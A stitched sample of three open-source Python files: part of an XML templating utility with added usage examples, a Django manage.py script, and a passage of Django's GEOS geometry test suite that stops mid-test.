{'slavetag': slave.root.tag,
'mastertag': self.root.tag})
raise ValueError(msg)
# Make sure slave applies to this template
if not slave.apply(self):
continue
slave_list.append(slave)
# Add the slaves
self.slaves.extend(slave_list)
def copy(self):
"""Return a copy of this master template."""
# Return a copy of the MasterTemplate
tmp = self.__class__(self.root, self.version, self.nsmap)
tmp.slaves = self.slaves[:]
return tmp
class SlaveTemplate(Template):
"""Represent a slave template.
Slave templates are versioned derivatives of templates. Each
slave has a minimum version and optional maximum version of the
master template to which they can be attached.
"""
def __init__(self, root, min_vers, max_vers=None, nsmap=None):
"""Initialize a slave template.
:param root: The root element of the template.
:param min_vers: The minimum permissible version of the master
template for this slave template to apply.
:param max_vers: An optional upper bound for the master
template version.
:param nsmap: An optional namespace dictionary to be
associated with the root element of the
template.
"""
super(SlaveTemplate, self).__init__(root, nsmap)
self.min_vers = min_vers
self.max_vers = max_vers
def __repr__(self):
"""Return string representation of the template."""
return ("<%s.%s object versions %s-%s at %#x>" %
(self.__class__.__module__, self.__class__.__name__,
self.min_vers, self.max_vers, id(self)))
def apply(self, master):
"""Hook method for determining slave applicability.
An overridable hook method used to determine if this template
is applicable as a slave to a given master template. This
version requires the master template to have a version number
between min_vers and max_vers.
:param master: The master template to test.
"""
# Does the master meet our minimum version requirement?
if master.version < self.min_vers:
return False
# How about our maximum version requirement?
if self.max_vers is not None and master.version > self.max_vers:
return False
return True
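# Editor's note: an illustrative sketch of the master/slave mechanism described
# in the docstrings above; not part of the original module, and the assumed
# object layout ({'server': {...}}) is only an example.
def _example_master_and_slave():
    master_root = TemplateElement('server', selector='server')
    master_root.set('id')
    master = MasterTemplate(master_root, 2)
    # The slave extends the output with a <name> child, but only applies to
    # master versions 1 through 2; a version 3 master would silently skip it.
    slave_root = TemplateElement('server', selector='server')
    name = SubTemplateElement(slave_root, 'name')
    name.text = 'name'
    master.attach(SlaveTemplate(slave_root, 1, 2))
    return master.serialize({'server': {'id': 'abc123', 'name': 'demo'}})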
class TemplateBuilder(object):
"""Template builder.
This class exists to allow templates to be lazily built without
having to build them each time they are needed. It must be
subclassed, and the subclass must implement the construct()
method, which must return a Template (or subclass) instance. The
constructor will always return the template returned by
construct(), or, if it has a copy() method, a copy of that
template.
"""
_tmpl = None
def __new__(cls, copy=True):
"""Construct and return a template.
:param copy: If True (the default), a copy of the template
will be constructed and returned, if possible.
"""
# Do we need to construct the template?
if cls._tmpl is None:
tmp = super(TemplateBuilder, cls).__new__(cls)
# Construct the template
cls._tmpl = tmp.construct()
# If the template has a copy attribute, return the result of
# calling it
if copy and hasattr(cls._tmpl, 'copy'):
return cls._tmpl.copy()
# Return the template
return cls._tmpl
def construct(self):
"""Construct a template.
Called to construct a template instance, which it must return.
Only called once.
"""
raise NotImplementedError(_("subclasses must implement construct()!"))
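# Editor's note: a hypothetical TemplateBuilder subclass showing the intended
# usage pattern; it is not part of the original module.
class _ExampleServerTemplate(TemplateBuilder):
    def construct(self):
        # Called only once; the resulting MasterTemplate is cached on the class
        # and copy()'d for every subsequent _ExampleServerTemplate() call.
        root = TemplateElement('server', selector='server')
        root.set('id')
        return MasterTemplate(root, 1)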
def make_links(parent, selector=None):
"""Attach an Atom <links> element to the parent."""
elem = SubTemplateElement(parent, '{%s}link' % XMLNS_ATOM,
selector=selector)
elem.set('rel')
elem.set('type')
elem.set('href')
# Just for completeness...
return elem
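# Editor's note: a small sketch of what make_links() attaches; not part of the
# original module.
def _example_make_links():
    root = TemplateElement('server', selector='server')
    link = make_links(root, 'links')
    # The returned child carries rel/type/href attribute selectors, each read
    # from the corresponding key of every dict selected by 'links'.
    return sorted(link.keys())
    # -> ['href', 'rel', 'type']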
def make_flat_dict(name, selector=None, subselector=None, ns=None):
"""Utility for simple XML templates.
Simple templates are templates that traditionally used
XMLDictSerializer with no metadata.
Returns a template element where the top-level element has the
given tag name, and where sub-elements have tag names derived
from the object's keys and text derived from the object's values.
This only works for flat dictionary objects, not dictionaries
containing nested lists or dictionaries.
"""
# Set up the names we need...
if ns is None:
elemname = name
tagname = Selector(0)
else:
elemname = '{%s}%s' % (ns, name)
tagname = lambda obj, do_raise=False: '{%s}%s' % (ns, obj[0])
if selector is None:
selector = name
# Build the root element
root = TemplateElement(elemname, selector=selector,
subselector=subselector)
# Build an element to represent all the keys and values
elem = SubTemplateElement(root, tagname, selector=get_items)
elem.text = 1
# Return the template
return root
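# Editor's note: an illustrative sketch of make_flat_dict(); not part of the
# original module.  The expected output assumes get_items(), defined earlier in
# this module, yields (key, value) pairs, and the exact bytes are approximate.
def _example_make_flat_dict():
    tmpl = Template(make_flat_dict('metadata'))
    # Each key of the selected dict becomes a tag and each value becomes text.
    return tmpl.serialize({'metadata': {'kernel_id': 'True'}})
    # -> roughly b'...<metadata><kernel_id>True</kernel_id></metadata>'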
| {
"content_hash": "e8723b4dbc2fba0612091f0b78f54800",
"timestamp": "",
"source": "github",
"line_count": 953,
"max_line_length": 79,
"avg_line_length": 31.28436516264428,
"alnum_prop": 0.5822767827195278,
"repo_name": "Hybrid-Cloud/conveyor",
"id": "86df072e0e889158ed41230c968a79fbc29bfd32",
"size": "30450",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "conveyor/api/xmlutil.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3789174"
},
{
"name": "Shell",
"bytes": "16567"
}
],
"symlink_target": ""
} |
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "spades.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| {
"content_hash": "235229d399c3ecc399366558a4ebee5f",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 70,
"avg_line_length": 25.22222222222222,
"alnum_prop": 0.7092511013215859,
"repo_name": "foxbenjaminfox/deckofcards",
"id": "b8a2fbaccb92042f437bc5ac4c0304e2ef87ab6b",
"size": "249",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "manage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "49349"
},
{
"name": "HTML",
"bytes": "12020"
},
{
"name": "JavaScript",
"bytes": "75173"
},
{
"name": "Python",
"bytes": "24548"
}
],
"symlink_target": ""
} |
import ctypes
import itertools
import json
import pickle
import random
from binascii import a2b_hex
from io import BytesIO
from unittest import mock, skipIf
from django.contrib.gis import gdal
from django.contrib.gis.geos import (
GeometryCollection, GEOSException, GEOSGeometry, LinearRing, LineString,
MultiLineString, MultiPoint, MultiPolygon, Point, Polygon, fromfile,
fromstr,
)
from django.contrib.gis.geos.libgeos import geos_version_tuple
from django.contrib.gis.shortcuts import numpy
from django.template import Context
from django.template.engine import Engine
from django.test import SimpleTestCase
from ..test_data import TestDataMixin
class GEOSTest(SimpleTestCase, TestDataMixin):
def test_wkt(self):
"Testing WKT output."
for g in self.geometries.wkt_out:
geom = fromstr(g.wkt)
if geom.hasz:
self.assertEqual(g.ewkt, geom.wkt)
def test_hex(self):
"Testing HEX output."
for g in self.geometries.hex_wkt:
geom = fromstr(g.wkt)
self.assertEqual(g.hex, geom.hex.decode())
def test_hexewkb(self):
"Testing (HEX)EWKB output."
# For testing HEX(EWKB).
ogc_hex = b'01010000000000000000000000000000000000F03F'
ogc_hex_3d = b'01010000800000000000000000000000000000F03F0000000000000040'
# `SELECT ST_AsHEXEWKB(ST_GeomFromText('POINT(0 1)', 4326));`
hexewkb_2d = b'0101000020E61000000000000000000000000000000000F03F'
# `SELECT ST_AsHEXEWKB(ST_GeomFromEWKT('SRID=4326;POINT(0 1 2)'));`
hexewkb_3d = b'01010000A0E61000000000000000000000000000000000F03F0000000000000040'
pnt_2d = Point(0, 1, srid=4326)
pnt_3d = Point(0, 1, 2, srid=4326)
# OGC-compliant HEX will not have SRID value.
self.assertEqual(ogc_hex, pnt_2d.hex)
self.assertEqual(ogc_hex_3d, pnt_3d.hex)
        # HEXEWKB should be appropriate for its dimension -- have to use
        # a WKBWriter w/dimension set accordingly, else GEOS will insert
        # garbage into the 3D coordinate if there is none.
self.assertEqual(hexewkb_2d, pnt_2d.hexewkb)
self.assertEqual(hexewkb_3d, pnt_3d.hexewkb)
self.assertIs(GEOSGeometry(hexewkb_3d).hasz, True)
# Same for EWKB.
self.assertEqual(memoryview(a2b_hex(hexewkb_2d)), pnt_2d.ewkb)
self.assertEqual(memoryview(a2b_hex(hexewkb_3d)), pnt_3d.ewkb)
# Redundant sanity check.
self.assertEqual(4326, GEOSGeometry(hexewkb_2d).srid)
def test_kml(self):
"Testing KML output."
for tg in self.geometries.wkt_out:
geom = fromstr(tg.wkt)
kml = getattr(tg, 'kml', False)
if kml:
self.assertEqual(kml, geom.kml)
def test_errors(self):
"Testing the Error handlers."
# string-based
for err in self.geometries.errors:
with self.assertRaises((GEOSException, ValueError)):
fromstr(err.wkt)
# Bad WKB
with self.assertRaises(GEOSException):
GEOSGeometry(memoryview(b'0'))
class NotAGeometry:
pass
# Some other object
with self.assertRaises(TypeError):
GEOSGeometry(NotAGeometry())
# None
with self.assertRaises(TypeError):
GEOSGeometry(None)
def test_wkb(self):
"Testing WKB output."
for g in self.geometries.hex_wkt:
geom = fromstr(g.wkt)
wkb = geom.wkb
self.assertEqual(wkb.hex().upper(), g.hex)
def test_create_hex(self):
"Testing creation from HEX."
for g in self.geometries.hex_wkt:
geom_h = GEOSGeometry(g.hex)
# we need to do this so decimal places get normalized
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test_create_wkb(self):
"Testing creation from WKB."
for g in self.geometries.hex_wkt:
wkb = memoryview(bytes.fromhex(g.hex))
geom_h = GEOSGeometry(wkb)
# we need to do this so decimal places get normalized
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test_ewkt(self):
"Testing EWKT."
srids = (-1, 32140)
for srid in srids:
for p in self.geometries.polygons:
ewkt = 'SRID=%d;%s' % (srid, p.wkt)
poly = fromstr(ewkt)
self.assertEqual(srid, poly.srid)
self.assertEqual(srid, poly.shell.srid)
self.assertEqual(srid, fromstr(poly.ewkt).srid) # Checking export
def test_json(self):
"Testing GeoJSON input/output (via GDAL)."
for g in self.geometries.json_geoms:
geom = GEOSGeometry(g.wkt)
if not hasattr(g, 'not_equal'):
# Loading jsons to prevent decimal differences
self.assertEqual(json.loads(g.json), json.loads(geom.json))
self.assertEqual(json.loads(g.json), json.loads(geom.geojson))
self.assertEqual(GEOSGeometry(g.wkt, 4326), GEOSGeometry(geom.json))
def test_json_srid(self):
geojson_data = {
"type": "Point",
"coordinates": [2, 49],
"crs": {
"type": "name",
"properties": {
"name": "urn:ogc:def:crs:EPSG::4322"
}
}
}
self.assertEqual(GEOSGeometry(json.dumps(geojson_data)), Point(2, 49, srid=4322))
def test_fromfile(self):
"Testing the fromfile() factory."
ref_pnt = GEOSGeometry('POINT(5 23)')
wkt_f = BytesIO()
wkt_f.write(ref_pnt.wkt.encode())
wkb_f = BytesIO()
wkb_f.write(bytes(ref_pnt.wkb))
# Other tests use `fromfile()` on string filenames so those
# aren't tested here.
for fh in (wkt_f, wkb_f):
fh.seek(0)
pnt = fromfile(fh)
self.assertEqual(ref_pnt, pnt)
def test_eq(self):
"Testing equivalence."
p = fromstr('POINT(5 23)')
self.assertEqual(p, p.wkt)
self.assertNotEqual(p, 'foo')
ls = fromstr('LINESTRING(0 0, 1 1, 5 5)')
self.assertEqual(ls, ls.wkt)
self.assertNotEqual(p, 'bar')
self.assertEqual(p, 'POINT(5.0 23.0)')
        # An error shouldn't be raised on equivalence testing with
        # an invalid type.
for g in (p, ls):
self.assertIsNotNone(g)
self.assertNotEqual(g, {'foo': 'bar'})
self.assertIsNot(g, False)
def test_hash(self):
point_1 = Point(5, 23)
point_2 = Point(5, 23, srid=4326)
point_3 = Point(5, 23, srid=32632)
multipoint_1 = MultiPoint(point_1, srid=4326)
multipoint_2 = MultiPoint(point_2)
multipoint_3 = MultiPoint(point_3)
self.assertNotEqual(hash(point_1), hash(point_2))
self.assertNotEqual(hash(point_1), hash(point_3))
self.assertNotEqual(hash(point_2), hash(point_3))
self.assertNotEqual(hash(multipoint_1), hash(multipoint_2))
self.assertEqual(hash(multipoint_2), hash(multipoint_3))
self.assertNotEqual(hash(multipoint_1), hash(point_1))
self.assertNotEqual(hash(multipoint_2), hash(point_2))
self.assertNotEqual(hash(multipoint_3), hash(point_3))
def test_eq_with_srid(self):
"Testing non-equivalence with different srids."
p0 = Point(5, 23)
p1 = Point(5, 23, srid=4326)
p2 = Point(5, 23, srid=32632)
# GEOS
self.assertNotEqual(p0, p1)
self.assertNotEqual(p1, p2)
# EWKT
self.assertNotEqual(p0, p1.ewkt)
self.assertNotEqual(p1, p0.ewkt)
self.assertNotEqual(p1, p2.ewkt)
# Equivalence with matching SRIDs
self.assertEqual(p2, p2)
self.assertEqual(p2, p2.ewkt)
# WKT contains no SRID so will not equal
self.assertNotEqual(p2, p2.wkt)
# SRID of 0
self.assertEqual(p0, 'SRID=0;POINT (5 23)')
self.assertNotEqual(p1, 'SRID=0;POINT (5 23)')
def test_points(self):
"Testing Point objects."
prev = fromstr('POINT(0 0)')
for p in self.geometries.points:
# Creating the point from the WKT
pnt = fromstr(p.wkt)
self.assertEqual(pnt.geom_type, 'Point')
self.assertEqual(pnt.geom_typeid, 0)
self.assertEqual(pnt.dims, 0)
self.assertEqual(p.x, pnt.x)
self.assertEqual(p.y, pnt.y)
self.assertEqual(pnt, fromstr(p.wkt))
self.assertIs(pnt == prev, False) # Use assertIs() to test __eq__.
# Making sure that the point's X, Y components are what we expect
self.assertAlmostEqual(p.x, pnt.tuple[0], 9)
self.assertAlmostEqual(p.y, pnt.tuple[1], 9)
# Testing the third dimension, and getting the tuple arguments
if hasattr(p, 'z'):
self.assertIs(pnt.hasz, True)
self.assertEqual(p.z, pnt.z)
self.assertEqual(p.z, pnt.tuple[2], 9)
tup_args = (p.x, p.y, p.z)
set_tup1 = (2.71, 3.14, 5.23)
set_tup2 = (5.23, 2.71, 3.14)
else:
self.assertIs(pnt.hasz, False)
self.assertIsNone(pnt.z)
tup_args = (p.x, p.y)
set_tup1 = (2.71, 3.14)
set_tup2 = (3.14, 2.71)
# Centroid operation on point should be point itself
self.assertEqual(p.centroid, pnt.centroid.tuple)
# Now testing the different constructors
pnt2 = Point(tup_args) # e.g., Point((1, 2))
pnt3 = Point(*tup_args) # e.g., Point(1, 2)
self.assertEqual(pnt, pnt2)
self.assertEqual(pnt, pnt3)
# Now testing setting the x and y
pnt.y = 3.14
pnt.x = 2.71
self.assertEqual(3.14, pnt.y)
self.assertEqual(2.71, pnt.x)
# Setting via the tuple/coords property
pnt.tuple = set_tup1
self.assertEqual(set_tup1, pnt.tuple)
pnt.coords = set_tup2
self.assertEqual(set_tup2, pnt.coords)
prev = pnt # setting the previous geometry
def test_point_reverse(self):
point = GEOSGeometry('POINT(144.963 -37.8143)', 4326)
self.assertEqual(point.srid, 4326)
point.reverse()
self.assertEqual(point.ewkt, 'SRID=4326;POINT (-37.8143 144.963)')
def test_multipoints(self):
"Testing MultiPoint objects."
for mp in self.geometries.multipoints:
mpnt = fromstr(mp.wkt)
self.assertEqual(mpnt.geom_type, 'MultiPoint')
self.assertEqual(mpnt.geom_typeid, 4)
self.assertEqual(mpnt.dims, 0)
self.assertAlmostEqual(mp.centroid[0], mpnt.centroid.tuple[0], 9)
self.assertAlmostEqual(mp.centroid[1], mpnt.centroid.tuple[1], 9)
with self.assertRaises(IndexError):
mpnt.__getitem__(len(mpnt))
self.assertEqual(mp.centroid, mpnt.centroid.tuple)
self.assertEqual(mp.coords, tuple(m.tuple for m in mpnt))
for p in mpnt:
self.assertEqual(p.geom_type, 'Point')
self.assertEqual(p.geom_typeid, 0)
self.assertIs(p.empty, False)
self.assertIs(p.valid, True)
def test_linestring(self):
"Testing LineString objects."
prev = fromstr('POINT(0 0)')
for line in self.geometries.linestrings:
ls = fromstr(line.wkt)
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertEqual(ls.dims, 1)
self.assertIs(ls.empty, False)
self.assertIs(ls.ring, False)
if hasattr(line, 'centroid'):
self.assertEqual(line.centroid, ls.centroid.tuple)
if hasattr(line, 'tup'):
self.assertEqual(line.tup, ls.tuple)
self.assertEqual(ls, fromstr(line.wkt))
self.assertIs(ls == prev, False) # Use assertIs() to test __eq__.
with self.assertRaises(IndexError):
ls.__getitem__(len(ls))
prev = ls
# Creating a LineString from a tuple, list, and numpy array
self.assertEqual(ls, LineString(ls.tuple)) # tuple
self.assertEqual(ls, LineString(*ls.tuple)) # as individual arguments
self.assertEqual(ls, LineString([list(tup) for tup in ls.tuple])) # as list
            # From Point objects passed as individual arguments
self.assertEqual(ls.wkt, LineString(*tuple(Point(tup) for tup in ls.tuple)).wkt)
if numpy:
self.assertEqual(ls, LineString(numpy.array(ls.tuple))) # as numpy array
with self.assertRaisesMessage(TypeError, 'Each coordinate should be a sequence (list or tuple)'):
LineString((0, 0))
with self.assertRaisesMessage(ValueError, 'LineString requires at least 2 points, got 1.'):
LineString([(0, 0)])
if numpy:
with self.assertRaisesMessage(ValueError, 'LineString requires at least 2 points, got 1.'):
LineString(numpy.array([(0, 0)]))
with mock.patch('django.contrib.gis.geos.linestring.numpy', False):
with self.assertRaisesMessage(TypeError, 'Invalid initialization input for LineStrings.'):
LineString('wrong input')
# Test __iter__().
self.assertEqual(list(LineString((0, 0), (1, 1), (2, 2))), [(0, 0), (1, 1), (2, 2)])
def test_linestring_reverse(self):
line = GEOSGeometry('LINESTRING(144.963 -37.8143,151.2607 -33.887)', 4326)
self.assertEqual(line.srid, 4326)
line.reverse()
self.assertEqual(line.ewkt, 'SRID=4326;LINESTRING (151.2607 -33.887, 144.963 -37.8143)')
def _test_is_counterclockwise(self):
lr = LinearRing((0, 0), (1, 0), (0, 1), (0, 0))
self.assertIs(lr.is_counterclockwise, True)
lr.reverse()
self.assertIs(lr.is_counterclockwise, False)
msg = 'Orientation of an empty LinearRing cannot be determined.'
with self.assertRaisesMessage(ValueError, msg):
LinearRing().is_counterclockwise
@skipIf(geos_version_tuple() < (3, 7), 'GEOS >= 3.7.0 is required')
def test_is_counterclockwise(self):
self._test_is_counterclockwise()
@skipIf(geos_version_tuple() < (3, 7), 'GEOS >= 3.7.0 is required')
def test_is_counterclockwise_geos_error(self):
with mock.patch('django.contrib.gis.geos.prototypes.cs_is_ccw') as mocked:
mocked.return_value = 0
mocked.func_name = 'GEOSCoordSeq_isCCW'
msg = 'Error encountered in GEOS C function "GEOSCoordSeq_isCCW".'
with self.assertRaisesMessage(GEOSException, msg):
LinearRing((0, 0), (1, 0), (0, 1), (0, 0)).is_counterclockwise
@mock.patch('django.contrib.gis.geos.libgeos.geos_version', lambda: b'3.6.9')
def test_is_counterclockwise_fallback(self):
self._test_is_counterclockwise()
def test_multilinestring(self):
"Testing MultiLineString objects."
prev = fromstr('POINT(0 0)')
for line in self.geometries.multilinestrings:
ml = fromstr(line.wkt)
self.assertEqual(ml.geom_type, 'MultiLineString')
self.assertEqual(ml.geom_typeid, 5)
self.assertEqual(ml.dims, 1)
self.assertAlmostEqual(line.centroid[0], ml.centroid.x, 9)
self.assertAlmostEqual(line.centroid[1], ml.centroid.y, 9)
self.assertEqual(ml, fromstr(line.wkt))
self.assertIs(ml == prev, False) # Use assertIs() to test __eq__.
prev = ml
for ls in ml:
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertIs(ls.empty, False)
with self.assertRaises(IndexError):
ml.__getitem__(len(ml))
self.assertEqual(ml.wkt, MultiLineString(*tuple(s.clone() for s in ml)).wkt)
self.assertEqual(ml, MultiLineString(*tuple(LineString(s.tuple) for s in ml)))
def test_linearring(self):
"Testing LinearRing objects."
for rr in self.geometries.linearrings:
lr = fromstr(rr.wkt)
self.assertEqual(lr.geom_type, 'LinearRing')
self.assertEqual(lr.geom_typeid, 2)
self.assertEqual(lr.dims, 1)
self.assertEqual(rr.n_p, len(lr))
self.assertIs(lr.valid, True)
self.assertIs(lr.empty, False)
# Creating a LinearRing from a tuple, list, and numpy array
self.assertEqual(lr, LinearRing(lr.tuple))
self.assertEqual(lr, LinearRing(*lr.tuple))
self.assertEqual(lr, LinearRing([list(tup) for tup in lr.tuple]))
if numpy:
self.assertEqual(lr, LinearRing(numpy.array(lr.tuple)))
with self.assertRaisesMessage(ValueError, 'LinearRing requires at least 4 points, got 3.'):
LinearRing((0, 0), (1, 1), (0, 0))
with self.assertRaisesMessage(ValueError, 'LinearRing requires at least 4 points, got 1.'):
LinearRing([(0, 0)])
if numpy:
with self.assertRaisesMessage(ValueError, 'LinearRing requires at least 4 points, got 1.'):
LinearRing(numpy.array([(0, 0)]))
def test_linearring_json(self):
self.assertJSONEqual(
LinearRing((0, 0), (0, 1), (1, 1), (0, 0)).json,
'{"coordinates": [[0, 0], [0, 1], [1, 1], [0, 0]], "type": "LineString"}',
)
def test_polygons_from_bbox(self):
"Testing `from_bbox` class method."
bbox = (-180, -90, 180, 90)
p = Polygon.from_bbox(bbox)
self.assertEqual(bbox, p.extent)
# Testing numerical precision
x = 3.14159265358979323
bbox = (0, 0, 1, x)
p = Polygon.from_bbox(bbox)
y = p.extent[-1]
self.assertEqual(format(x, '.13f'), format(y, '.13f'))
def test_polygons(self):
"Testing Polygon objects."
prev = fromstr('POINT(0 0)')
for p in self.geometries.polygons:
# Creating the Polygon, testing its properties.
poly = fromstr(p.wkt)
self.assertEqual(poly.geom_type, 'Polygon')
self.assertEqual(poly.geom_typeid, 3)
self.assertEqual(poly.dims, 2)
self.assertIs(poly.empty, False)
self.assertIs(poly.ring, False)
self.assertEqual(p.n_i, poly.num_interior_rings)
self.assertEqual(p.n_i + 1, len(poly)) # Testing __len__
self.assertEqual(p.n_p, poly.num_points)
# Area & Centroid
self.assertAlmostEqual(p.area, poly.area, 9)
self.assertAlmostEqual(p.centroid[0], poly.centroid.tuple[0], 9)
self.assertAlmostEqual(p.centroid[1], poly.centroid.tuple[1], 9)
# Testing the geometry equivalence
self.assertEqual(poly, fromstr(p.wkt))
# Should not be equal to previous geometry
self.assertIs(poly == prev, False) # Use assertIs() to test __eq__.
self.assertIs(poly != prev, True) # Use assertIs() to test __ne__.
# Testing the exterior ring
ring = poly.exterior_ring
self.assertEqual(ring.geom_type, 'LinearRing')
self.assertEqual(ring.geom_typeid, 2)
if p.ext_ring_cs:
self.assertEqual(p.ext_ring_cs, ring.tuple)
self.assertEqual(p.ext_ring_cs, poly[0].tuple) # Testing __getitem__
# Testing __getitem__ and __setitem__ on invalid indices
with self.assertRaises(IndexError):
poly.__getitem__(len(poly))
with self.assertRaises(IndexError):
poly.__setitem__(len(poly), False)
with self.assertRaises(IndexError):
poly.__getitem__(-1 * len(poly) - 1)
# Testing __iter__
for r in poly:
self.assertEqual(r.geom_type, 'LinearRing')
self.assertEqual(r.geom_typeid, 2)
# Testing polygon construction.
with self.assertRaises(TypeError):
Polygon(0, [1, 2, 3])
with self.assertRaises(TypeError):
Polygon('foo')
# Polygon(shell, (hole1, ... holeN))
ext_ring, *int_rings = poly
self.assertEqual(poly, Polygon(ext_ring, int_rings))
# Polygon(shell_tuple, hole_tuple1, ... , hole_tupleN)
ring_tuples = tuple(r.tuple for r in poly)
self.assertEqual(poly, Polygon(*ring_tuples))
# Constructing with tuples of LinearRings.
self.assertEqual(poly.wkt, Polygon(*tuple(r for r in poly)).wkt)
self.assertEqual(poly.wkt, Polygon(*tuple(LinearRing(r.tuple) for r in poly)).wkt)
def test_polygons_templates(self):
# Accessing Polygon attributes in templates should work.
engine = Engine()
template = engine.from_string('{{ polygons.0.wkt }}')
polygons = [fromstr(p.wkt) for p in self.geometries.multipolygons[:2]]
content = template.render(Context({'polygons': polygons}))
self.assertIn('MULTIPOLYGON (((100', content)
def test_polygon_comparison(self):
p1 = Polygon(((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
p2 = Polygon(((0, 0), (0, 1), (1, 0), (0, 0)))
self.assertGreater(p1, p2)
self.assertLess(p2, p1)
p3 = Polygon(((0, 0), (0, 1), (1, 1), (2, 0), (0, 0)))
p4 = Polygon(((0, 0), (0, 1), (2, 2), (1, 0), (0, 0)))
self.assertGreater(p4, p3)
self.assertLess(p3, p4)
def test_multipolygons(self):
"Testing MultiPolygon objects."
fromstr('POINT (0 0)')
for mp in self.geometries.multipolygons:
mpoly = fromstr(mp.wkt)
self.assertEqual(mpoly.geom_type, 'MultiPolygon')
self.assertEqual(mpoly.geom_typeid, 6)
self.assertEqual(mpoly.dims, 2)
self.assertEqual(mp.valid, mpoly.valid)
if mp.valid:
self.assertEqual(mp.num_geom, mpoly.num_geom)
self.assertEqual(mp.n_p, mpoly.num_coords)
self.assertEqual(mp.num_geom, len(mpoly))
with self.assertRaises(IndexError):
mpoly.__getitem__(len(mpoly))
for p in mpoly:
self.assertEqual(p.geom_type, 'Polygon')
self.assertEqual(p.geom_typeid, 3)
self.assertIs(p.valid, True)
self.assertEqual(mpoly.wkt, MultiPolygon(*tuple(poly.clone() for poly in mpoly)).wkt)
def test_memory_hijinks(self):
"Testing Geometry __del__() on rings and polygons."
# #### Memory issues with rings and poly
# These tests are needed to ensure sanity with writable geometries.
# Getting a polygon with interior rings, and pulling out the interior rings
poly = fromstr(self.geometries.polygons[1].wkt)
ring1 = poly[0]
ring2 = poly[1]
# These deletes should be 'harmless' since they are done on child geometries
del ring1
del ring2
ring1 = poly[0]
ring2 = poly[1]
# Deleting the polygon
del poly
# Access to these rings is OK since they are clones.
str(ring1)
str(ring2)
def test_coord_seq(self):
"Testing Coordinate Sequence objects."
for p in self.geometries.polygons:
if p.ext_ring_cs:
# Constructing the polygon and getting the coordinate sequence
poly = fromstr(p.wkt)
cs = poly.exterior_ring.coord_seq
self.assertEqual(p.ext_ring_cs, cs.tuple) # done in the Polygon test too.
self.assertEqual(len(p.ext_ring_cs), len(cs)) # Making sure __len__ works
# Checks __getitem__ and __setitem__
for i in range(len(p.ext_ring_cs)):
c1 = p.ext_ring_cs[i] # Expected value
c2 = cs[i] # Value from coordseq
self.assertEqual(c1, c2)
# Constructing the test value to set the coordinate sequence with
if len(c1) == 2:
tset = (5, 23)
else:
tset = (5, 23, 8)
cs[i] = tset
# Making sure every set point matches what we expect
for j in range(len(tset)):
cs[i] = tset
self.assertEqual(tset[j], cs[i][j])
def test_relate_pattern(self):
"Testing relate() and relate_pattern()."
g = fromstr('POINT (0 0)')
with self.assertRaises(GEOSException):
g.relate_pattern(0, 'invalid pattern, yo')
for rg in self.geometries.relate_geoms:
a = fromstr(rg.wkt_a)
b = fromstr(rg.wkt_b)
self.assertEqual(rg.result, a.relate_pattern(b, rg.pattern))
self.assertEqual(rg.pattern, a.relate(b))
def test_intersection(self):
"Testing intersects() and intersection()."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
i1 = fromstr(self.geometries.intersect_geoms[i].wkt)
self.assertIs(a.intersects(b), True)
i2 = a.intersection(b)
self.assertTrue(i1.equals(i2))
self.assertTrue(i1.equals(a & b)) # __and__ is intersection operator
a &= b # testing __iand__
self.assertTrue(i1.equals(a))
def test_union(self):
"Testing union()."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
u1 = fromstr(self.geometries.union_geoms[i].wkt)
u2 = a.union(b)
self.assertTrue(u1.equals(u2))
self.assertTrue(u1.equals(a | b)) # __or__ is union operator
a |= b # testing __ior__
self.assertTrue(u1.equals(a))
def test_unary_union(self):
"Testing unary_union."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
u1 = fromstr(self.geometries.union_geoms[i].wkt)
u2 = GeometryCollection(a, b).unary_union
self.assertTrue(u1.equals(u2))
def test_difference(self):
"Testing difference()."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
d1 = fromstr(self.geometries.diff_geoms[i].wkt)
d2 = a.difference(b)
self.assertTrue(d1.equals(d2))
self.assertTrue(d1.equals(a - b)) # __sub__ is difference operator
a -= b # testing __isub__
self.assertTrue(d1.equals(a))
def test_symdifference(self):
"Testing sym_difference()."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
d1 = fromstr(self.geometries.sdiff_geoms[i].wkt)
d2 = a.sym_difference(b)
self.assertTrue(d1.equals(d2))
self.assertTrue(d1.equals(a ^ b)) # __xor__ is symmetric difference operator
a ^= b # testing __ixor__
self.assertTrue(d1.equals(a))
def test_buffer(self):
bg = self.geometries.buffer_geoms[0]
g = fromstr(bg.wkt)
# Can't use a floating-point for the number of quadsegs.
with self.assertRaises(ctypes.ArgumentError):
g.buffer(bg.width, quadsegs=1.1)
self._test_buffer(self.geometries.buffer_geoms, 'buffer')
def test_buffer_with_style(self):
bg = self.geometries.buffer_with_style_geoms[0]
g = fromstr(bg.wkt)
# Can't use a floating-point for the number of quadsegs.
with self.assertRaises(ctypes.ArgumentError):
g.buffer_with_style(bg.width, quadsegs=1.1)
# Can't use a floating-point for the end cap style.
with self.assertRaises(ctypes.ArgumentError):
g.buffer_with_style(bg.width, end_cap_style=1.2)
        # Can't use an end cap style that is not in the enum.
with self.assertRaises(GEOSException):
